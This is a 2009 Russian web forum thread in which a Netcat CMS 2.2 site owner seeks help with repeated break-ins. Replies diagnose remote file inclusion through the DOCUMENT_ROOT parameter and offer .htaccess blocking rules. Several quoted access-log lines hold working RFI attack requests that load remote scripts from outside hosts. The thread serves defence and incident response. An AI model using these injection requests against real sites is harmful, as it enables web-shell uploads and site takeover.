Регистрация
Вход через соцсети
Восстановление пароля

Взломали сайт.

Новый топик
03.08.2009, 19:46
Ответить | Цитировать
sleg

Зарегистрирован:
2009-04-06
Сообщений: 5

Есть сайт на Netcat Small Business 2.2 (Последнее установленное обновление:№223)

Последние два дня его упорно пытаются сломать. Хостер говорит о том что идет заливка шела и уже через него запуск вредоносных программ. (есть список запускаемых процессов, но мне они ни о чем не говорят.

Пытался обновиться вот здесь http://netcat.ru/forclients/update/Patches/sb.html но система выдает ошибки.

Скажите как можно это исправить?
04.08.2009, 12:18
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

На счет обновлений ничего не скажу, не уверен, что неткет как-то поддерживает 2.2.

Версии 2.2 ломались легко путем подставления в систему пхп скриптов через переменную DOCUMENT_ROOT, в лог файле веб-сервера это выглядит вот так:
Код:
190.226.148.20 - - [26/May/2009:23:54:40 +0400] "GET /map/e404.php?DOCUMENT_ROOT=http://64.32.13.142/spread.txt? HTTP/1.0" 200 - "-" "Mozilla/3.0 (compatible; Indy Library)" 
151.82.39.237 - - [27/May/2009:02:11:47 +0400] "GET /e404.php?DOCUMENT_ROOT=http://questoeilmiosito.altervista.org/nitro.txt?? HTTP/1.0" 200 83289 "-" "Mozilla/3.0 (compatible; Indy Library)"


для избежания этого в файл .htaccess допишите строки:
Код:

SetEnvIfNoCase Request_URI "DOCUMENT_ROOT" bad_bot
<Limit GET POST HEAD>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>


Temet nosce...
04.08.2009, 20:08
Ответить | Цитировать
sleg

Зарегистрирован:
2009-04-06
Сообщений: 5

спасибо. попробую, может поможет, но в логах сайта я не нашел таких строк. там на удивления вобщем ничего подозрительного нет.

суть изменнений на сайте сводится к тому что удаляют или добавляют файлы папки require, или заливают свои папки со скрипати на ftp.
04.08.2009, 21:34
Ответить | Цитировать
Гость
Гость

sleg писал(а):
в логах сайта я не нашел таких строк

Это вполне могло произойти несколько лет назад.
06.08.2009, 14:19
Ответить | Цитировать
sleg

Зарегистрирован:
2009-04-06
Сообщений: 5

Посмотрел логи, и вот что обнаружил - сначала идет взлом файла s_loadenv.inc.php через запрос:
Код:
66.110.122.197 - - [05/Aug/2009:00:49:51 +0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.hanyeong.ac.kr//bbs//data/honey.gif??? HTTP/1.0" 404 4250 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"


идет порядка 100 таких запросов, в различных вариантах, с отсылкой на различные сайты, потом идет взлом e404.php через такой же запрос:

Код:
174.143.240.203 - - [05/Aug/2009:04:53:08 +0400] "GET /e404.php?DOCUMENT_ROOT=http://www.hit168.com.cn/idanyar.txt??? HTTP/1.0" 404 4250 "-" "libwww-perl/5.805"


далее идет смена CHMOD, потом идет заливка файлов в корневую директорию и в директорию require ну а далее запуск скриптов рассылки и прочей гадости.

ПОМОГИТЕ ПОЖАЛУЙСТА! Я уже не знаю чего делать, 4-й день подряд ломают сайт, я делаю, они ломают...
06.08.2009, 15:44
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Я черным по белому написал!!! Вы ЭТО сделали?

DiGGy писал(а):

для избежания этого в файл .htaccess допишите строки:
Код:

SetEnvIfNoCase Request_URI "DOCUMENT_ROOT" bad_bot
<Limit GET POST HEAD>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</Limit>


Temet nosce...
07.08.2009, 01:37
Ответить | Цитировать
sleg

Зарегистрирован:
2009-04-06
Сообщений: 5

ДА! Сделал, не помогло.
09.08.2009, 22:56
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Выложите на форум содержание своего файла .htaccess из директории, где присутствует каталог /netcat/

Temet nosce...
16.08.2009, 02:03
Ответить | Цитировать
sleg

Зарегистрирован:
2009-04-06
Сообщений: 5

Код:
DirectoryIndex index.php
ErrorDocument 404 /netcat/require/e404.php

SetEnv PHPRC "/www/www.magicity.ru/path/to/php_ini/"

<ifModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-l
RewriteRule ^(.+)$ /netcat/require/e404.php?REQUEST_URI=$1 [L,QSA]
</ifModule>

SetEnvIfNoCase Request_URI "DOCUMENT_ROOT" bad_bot

<Limit GET POST HEAD>

Order Allow,Deny

Allow from all

Deny from env=bad_bot

</Limit>
17.08.2009, 15:50
Ответить | Цитировать
Гость
Гость

фыв
24.08.2009, 00:48
Ответить | Цитировать
DiGGy
DiGGy
DiGGy

Зарегистрирован:
2005-04-04
Сообщений: 1546

Извиняюсь, ввел Вас в заблуждение. В Вашем случае надо дописать то что красным выделено:

Код:
DirectoryIndex index.php
ErrorDocument 404 /netcat/require/e404.php

SetEnv PHPRC "/www/www.magicity.ru/path/to/php_ini/"

<ifModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-l
RewriteRule ^(.+)$ /netcat/require/e404.php?REQUEST_URI=$1 [L,QSA]

# запрет доступа для всех запросов, содержащий переменную DOCUMENT_ROOT
RewriteCond %{QUERY_STRING} DOCUMENT_ROOT= [NC]
RewriteRule ^.*$ - [F]
</ifModule>


Temet nosce...
198 196 2009-08-24 00:48:38 7753
Описание проекта